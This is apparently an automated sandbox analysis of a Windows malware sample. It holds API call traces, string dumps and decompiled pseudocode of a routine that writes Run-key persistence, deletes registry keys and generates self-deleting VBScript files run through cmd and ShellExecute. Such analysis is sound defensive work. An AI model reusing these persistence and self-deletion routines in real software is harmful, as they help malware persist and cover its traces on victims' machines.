                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                        • exit.MSVCRT ref: 00408980
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1819783940-1536747724
                                        • Opcode ID: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                        • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                        • Opcode Fuzzy Hash: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                        • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408245, Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                        0x0040824e
                                        0x0040825a
                                        0x00408261
                                        0x00408261
                                        0x0040826d
                                        0x0040826f
                                        0x0040826f
                                        0x0040827b
                                        0x00408282
                                        0x00408289
                                        0x0040828e
                                        0x0040829e
                                        0x004082a8
                                        0x004082ac
                                        0x004082b5
                                        0x004082ba
                                        0x004082ba
                                        0x004082c4
                                        0x004082c8
                                        0x004082d5
                                        0x004082da
                                        0x004082da
                                        0x004082e4
                                        0x004082e8
                                        0x004082f9
                                        0x004082fe
                                        0x004082fe
                                        0x00408301
                                        0x00408316
                                        0x00408318
                                        0x00408321
                                        0x0040832a
                                        0x0040834a
                                        0x00408352
                                        0x00408357
                                        0x0040835c
                                        0x00408368
                                        0x00408368
                                        0x00408370
                                        0x00408378
                                        0x0040837e
                                        0x00408390
                                        0x00408394
                                        0x0040839a
                                        0x004083a6
                                        0x004083ad
                                        0x004083ad
                                        0x004083bf
                                        0x004083c7
                                        0x004083c9
                                        0x004083c9
                                        0x004083cc
                                        0x004083da
                                        0x004083e5
                                        0x004083f0
                                        0x004083fb
                                        0x00408401
                                        0x0040840d
                                        0x0040841d
                                        0x00408422
                                        0x00408428
                                        0x00408432
                                        0x0040843d
                                        0x00408447
                                        0x0040844e
                                        0x00408457
                                        0x00408460
                                        0x00408464
                                        0x00408469
                                        0x00408470
                                        0x00408479
                                        0x00408482
                                        0x0040848b
                                        0x0040848b
                                        0x0040849d
                                        0x004084a9
                                        0x004084b0
                                        0x004084b4
                                        0x004084bd
                                        0x004084c1
                                        0x004084c6
                                        0x004084cd
                                        0x004084d6
                                        0x004084df
                                        0x004084e8
                                        0x004084f2
                                        0x004084fc
                                        0x004084fc
                                        0x00408502
                                        0x00408503
                                        0x0040850a
                                        0x00408512
                                        0x0040851b
                                        0x00408524
                                        0x00408528
                                        0x0040852d
                                        0x00408534
                                        0x0040853d
                                        0x00408546
                                        0x00408546
                                        0x00408554
                                        0x00408560
                                        0x0040856a
                                        0x00408576
                                        0x0040857d
                                        0x00408582
                                        0x00408587
                                        0x0040858f
                                        0x0040859c
                                        0x0040859c
                                        0x004085a3
                                        0x004085a9
                                        0x004085aa
                                        0x004085ab
                                        0x004085af
                                        0x004085b5
                                        0x004085c1
                                        0x004085c8
                                        0x004085c8
                                        0x004085d4
                                        0x004085d6
                                        0x004085d6
                                        0x004085e2
                                        0x004085e9
                                        0x004085f0
                                        0x004085f5
                                        0x00408605
                                        0x0040860f
                                        0x00408613
                                        0x0040861c
                                        0x00408621
                                        0x00408621
                                        0x0040862b
                                        0x0040862f
                                        0x0040863c
                                        0x00408641
                                        0x00408641
                                        0x0040864b
                                        0x0040864f
                                        0x00408660
                                        0x00408665
                                        0x00408665
                                        0x0040866f
                                        0x00408678
                                        0x00408698
                                        0x004086a0
                                        0x004086a5
                                        0x004086aa
                                        0x004086b6
                                        0x004086b6
                                        0x004086be
                                        0x004086c6
                                        0x004086df
                                        0x004086e3
                                        0x004086e7
                                        0x004086e9
                                        0x004086e9
                                        0x004086f7
                                        0x00408701
                                        0x00408709
                                        0x00408710
                                        0x00408710
                                        0x00408712
                                        0x00408720
                                        0x0040872b
                                        0x00408736
                                        0x00408741
                                        0x00408747
                                        0x00408753
                                        0x00408763
                                        0x00408768
                                        0x0040876e
                                        0x00408778
                                        0x00408783
                                        0x0040878d
                                        0x00408794
                                        0x0040879d
                                        0x004087a6
                                        0x004087aa
                                        0x004087af
                                        0x004087b6
                                        0x004087bf
                                        0x004087c8
                                        0x004087d1
                                        0x004087d1
                                        0x004087d7
                                        0x004087e4
                                        0x004087f0
                                        0x004087f7
                                        0x004087fb
                                        0x00408804
                                        0x00408808
                                        0x0040880d
                                        0x00408814
                                        0x0040881d
                                        0x00408826
                                        0x0040882f
                                        0x00408839
                                        0x00408843
                                        0x00408843
                                        0x00408850
                                        0x0040885a
                                        0x0040885e
                                        0x00408867
                                        0x00408870
                                        0x00408874
                                        0x00408879
                                        0x00408880
                                        0x00408889
                                        0x00408892
                                        0x00408892
                                        0x00408898
                                        0x004088a9
                                        0x004088b4
                                        0x004088c0
                                        0x004088c7
                                        0x004088cb
                                        0x004088d4
                                        0x004088d8
                                        0x004088e1
                                        0x004088e5
                                        0x004088f1
                                        0x004088fa
                                        0x00408903
                                        0x0040890c
                                        0x00408915
                                        0x0040891e
                                        0x0040892c
                                        0x00408938
                                        0x00408942
                                        0x0040894e
                                        0x00408955
                                        0x0040895f
                                        0x00408967
                                        0x00408974
                                        0x0040897d
                                        0x00408980
                                        0x00408980
                                        0x0040897d
                                        0x00408989
                                        0x00408992
                                        0x0040899b
                                        0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
